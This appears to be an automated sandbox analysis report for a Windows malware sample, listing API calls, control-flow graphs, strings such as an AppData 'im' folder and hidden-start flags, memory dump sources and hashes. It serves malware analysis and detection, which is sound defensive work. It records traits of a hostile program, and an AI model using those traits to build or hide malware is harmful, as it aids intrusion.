                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CreateMutexlstrcmp
                                                                                                                                  • String ID: -AHIDE -ASTART$C:\Users\user\AppData\Roaming\im\$C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 2704946443-4209170246
                                                                                                                                  • Opcode ID: 76fc11f9acb6136d770fbadf6cf0d918b360d5ef2d081682f92c8f0c3e9f85b7
                                                                                                                                  • Instruction ID: 0a44a9b4900998484c27ef3677e8648ba0f4d2d7421db97b6cf58851316d6b93
                                                                                                                                  • Opcode Fuzzy Hash: 76fc11f9acb6136d770fbadf6cf0d918b360d5ef2d081682f92c8f0c3e9f85b7
                                                                                                                                  • Instruction Fuzzy Hash: 8A31D6F1A54345EFEBA17BB0EC6EBEE3BE4EF00714F154354F250A9081DA7996208B16

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • StrRStrIA.SHELL32(?,00000000,07063CB9), ref: 0706597C
                                                                                                                                  • StrRStrIA.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\im\), ref: 07065990
                                                                                                                                  • StrRStrIA.SHELL32(?,00000000,\log\), ref: 070659A4
                                                                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 070659CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\im\$\log\
                                                                                                                                  • API String ID: 823142352-3225649886

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 46 70659d8-70659e1 47 7065a32-7065a4f CreateFileW 46->47 48 70659e3-70659ea 46->48 48->47 49 70659ec-70659fe StrRStrIW 48->49 49->47 50 7065a00-7065a12 StrRStrIW 49->50 51 7065a14-7065a26 StrRStrIW 50->51 52 7065a28-7065a2f 50->52 51->47 51->52
                                                                                                                                  APIs
                                                                                                                                  • StrRStrIW.SHELL32(?,00000000,07063CC1), ref: 070659F6
                                                                                                                                  • StrRStrIW.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\im\), ref: 07065A0A
                                                                                                                                  • StrRStrIW.SHELL32(?,00000000,.log), ref: 07065A1E
                                                                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 07065A47
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID: .log$C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 823142352-2154642801

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065C7A
                                                                                                                                  • -AHIDE -ASTART, xrefs: 07065CF8
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065C64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmplstrlen
                                                                                                                                  • String ID: -AHIDE -ASTART$C:\Users\user\AppData\Roaming\im\$C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 898299967-4209170246

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 89 7065c39-7065c42 lstrcmp 90 7065c44-7065c50 89->90 91 7065c55-7065ca0 call 70651ae 89->91 90->91 105 7065ca5 call 7065021 91->105 106 7065ca5 call 7065059 91->106 98 7065caa-7065caf 100 7065cb4-7065d08 lstrlen call 7065d0d 98->100 105->98 106->98
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065C7A
                                                                                                                                  • -AHIDE -ASTART, xrefs: 07065CF8
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065C64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmplstrlen
                                                                                                                                  • String ID: -AHIDE -ASTART$C:\Users\user\AppData\Roaming\im\$C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 898299967-4209170246
                                                                                                                                  APIs
                                                                                                                                  • lstrcmp.KERNEL32(?,07065044), ref: 07065047
                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,?,0706501D,?,?), ref: 0706509A
                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,0706501D,?,?), ref: 070650B6
                                                                                                                                    • Part of subcall function 07065059: lstrcmp.KERNEL32(?,07065056), ref: 0706505A
                                                                                                                                    • Part of subcall function 07065059: lstrcat.KERNEL32(?,?), ref: 07065075
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Findlstrcmp$CloseFileNextlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 360925478-0

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 107 7065059-7065062 lstrcmp 108 7065064-706508d lstrcat 107->108 109 7065093-70650a2 FindNextFileA 107->109 108->109 110 70650a4-70650bd FindClose 109->110 111 706503f-706504f call 7065046 109->111 111->109 116 7065051-7065062 call 7065059 111->116 116->108 116->109
                                                                                                                                  APIs
                                                                                                                                  • lstrcmp.KERNEL32(?,07065056), ref: 0706505A
                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 07065075
                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,?,0706501D,?,?), ref: 0706509A
                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,0706501D,?,?), ref: 070650B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileNextlstrcatlstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 122021188-0

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 119 706582b-7065840 120 7065846-7065851 119->120 121 7065940-7065942 119->121 122 7065853-7065856 120->122 123 706586b-7065892 VirtualAlloc 122->123 124 7065858-706585f 122->124 123->121 125 7065898-70658a5 123->125 124->121 129 7065865-7065869 124->129 127 70658a7-70658ba 125->127 128 70658ca-7065934 VirtualProtect * 2 125->128 130 70658c0-70658c2 127->130 132 7065937-706593a 128->132 129->122 130->132 133 70658c4-70658c7 130->133 132->121 133->128
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000005,00003000,00000040), ref: 0706588D
                                                                                                                                  • VirtualProtect.KERNEL32(?,00000005,00000040,00000000), ref: 07065910
                                                                                                                                  • VirtualProtect.KERNEL32(?,00000005,00000000,00000000), ref: 07065934
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Protect$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2541858876-0
                                                                                                                                  • Opcode ID: 6f181bb88a94a0cb614f280f5f816ddd7c00b5ad6d6a68cbaf35a27578764d9a
                                                                                                                                  • Instruction ID: 27af3988b2ea9de96b75faac7d74f7bf3f980dfbcef0db96785dfc6e3ffe1b72
                                                                                                                                  • Opcode Fuzzy Hash: 6f181bb88a94a0cb614f280f5f816ddd7c00b5ad6d6a68cbaf35a27578764d9a
                                                                                                                                  • Instruction Fuzzy Hash: 7F3162B5A00206AFDB10DFB4CD48EAEBBF5EF44710F158259E901AB295EB75ED10CB60
                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 07002035
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 07002099
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.2498022961.0000000007002000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07002000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_7002000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3498533004-0
                                                                                                                                  • Opcode ID: 2f4cd2e719df8fe111334384f9a62bc17892a031e89252502db5d86b87ef1463
                                                                                                                                  • Instruction ID: eeadf3680fce8816b1a84905174363de9d5451d2b6f277e3f8891d287f9e3931
                                                                                                                                  • Opcode Fuzzy Hash: 2f4cd2e719df8fe111334384f9a62bc17892a031e89252502db5d86b87ef1463
                                                                                                                                  • Instruction Fuzzy Hash: CD114CB0600301EFEB616F74CD4AB593BE5FB04300F11C261A981DB6D9DA75E9008B51

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 135 7065bd6-7065bf4 wsprintfA CreateMutexA 137 7065bf6 135->137 138 7065bf8-7065bfb 135->138 137->138
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateMutexwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1107950-0
                                                                                                                                  • Opcode ID: d6b265f30c0000cb4ee3c3ae0c8c3113ac972abb13f456979e58860616557185
                                                                                                                                  • Instruction ID: 5bf20dcb11a86c96fbfc81557a3fa0ee84782dbb9d45e56f7a9f264c56e93f9a
                                                                                                                                  • Opcode Fuzzy Hash: d6b265f30c0000cb4ee3c3ae0c8c3113ac972abb13f456979e58860616557185
                                                                                                                                  • Instruction Fuzzy Hash: D7D0A9B2A00210ABCF612F99EC8DA9E3FA4EF112A03018125FA159A010D23982208F80

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 139 7065f2b-7065f65 wsprintfA RegOpenKeyExA
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Openwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2091901810-0
                                                                                                                                  • Opcode ID: 1e61c5231248df49d06951fc93010148e91dc19ec7c0d641d84cfb8f8efadff7
                                                                                                                                  • Instruction ID: 377cfcae8c529264b4f9c146eaab5d9f9b97a059a46654f9482a84ed8025c0f2
                                                                                                                                  • Opcode Fuzzy Hash: 1e61c5231248df49d06951fc93010148e91dc19ec7c0d641d84cfb8f8efadff7
                                                                                                                                  • Instruction Fuzzy Hash: A8D05272000109EBDF029F80ED8A8EE3E6AFB04384F014402F90200022C33AC470ABA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 153 70651ae-70651e4 SetErrorMode
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 070651E0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                  • Opcode ID: dc6d8606d4bd64a4dbd01e39ebbdbdc26ac80f6bb412cd2facad89e04eed3d93
                                                                                                                                  • Instruction ID: 2a3ed264cf21b3d99d942d95710bc93877b227c8415a86c7e5bd8e8212393744
                                                                                                                                  • Opcode Fuzzy Hash: dc6d8606d4bd64a4dbd01e39ebbdbdc26ac80f6bb412cd2facad89e04eed3d93
                                                                                                                                  • Instruction Fuzzy Hash: 7CE0E2B1D01308EFDB51DFA4D60978EBBF0BB10308F6181A8C48163644EBB9AF08AF41
                                                                                                                                  APIs
                                                                                                                                  • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Roaming\im\), ref: 07065B26
                                                                                                                                  • PathRemoveBackslashA.SHLWAPI(?), ref: 07065B2D
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065B20
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BackslashPathRemovelstrcpy
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 295623078-3122922850
                                                                                                                                  • Opcode ID: fd4995a44be9dc5fca0b7df7b583dd90cbd1bb88703b5ced8d71107f1c7a9b88
                                                                                                                                  • Instruction ID: 711d9799f5b4b63593ccff720b7bbf76eeea441da7a70a56f5e72997443f2353
                                                                                                                                  • Opcode Fuzzy Hash: fd4995a44be9dc5fca0b7df7b583dd90cbd1bb88703b5ced8d71107f1c7a9b88
                                                                                                                                  • Instruction Fuzzy Hash: 6FE01AB2200209BFDB51AF94EC8AC6F3BEDEB19259B515911FA02E1122C779D8209A70
                                                                                                                                  APIs
                                                                                                                                  • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Roaming\im\), ref: 07065B68
                                                                                                                                  • PathRemoveBackslashA.SHLWAPI(?), ref: 07065B6F
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065B62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BackslashPathRemovelstrcpy
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 295623078-3122922850
                                                                                                                                  • Opcode ID: d33a3d0af1c2dccd528ae9e2764705d67d934a0000359ccbf04a884505d6f217
                                                                                                                                  • Instruction ID: d3f38cde233a08838843537171e06c0318da4773113552ffacf6acfb71a8f0ec
                                                                                                                                  • Opcode Fuzzy Hash: d33a3d0af1c2dccd528ae9e2764705d67d934a0000359ccbf04a884505d6f217
                                                                                                                                  • Instruction Fuzzy Hash: 5AD05E732155246FDAA1BA64BC07CCE73DCEA626657028201F842E3200D2ACF620CBE4